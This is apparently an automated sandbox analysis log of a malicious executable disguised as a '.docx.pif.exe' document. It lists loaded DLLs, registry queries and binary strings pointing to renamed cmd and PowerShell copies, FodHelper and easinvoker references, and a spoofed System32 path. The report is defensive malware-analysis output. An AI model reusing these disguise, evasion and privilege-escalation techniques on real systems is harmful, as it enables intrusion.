Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\colorcpl.exe

Window detected: Number of UI elements: 12

Source: C:\Users\Public\xkn.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows \System32\per.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static file information: File size 1085440 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
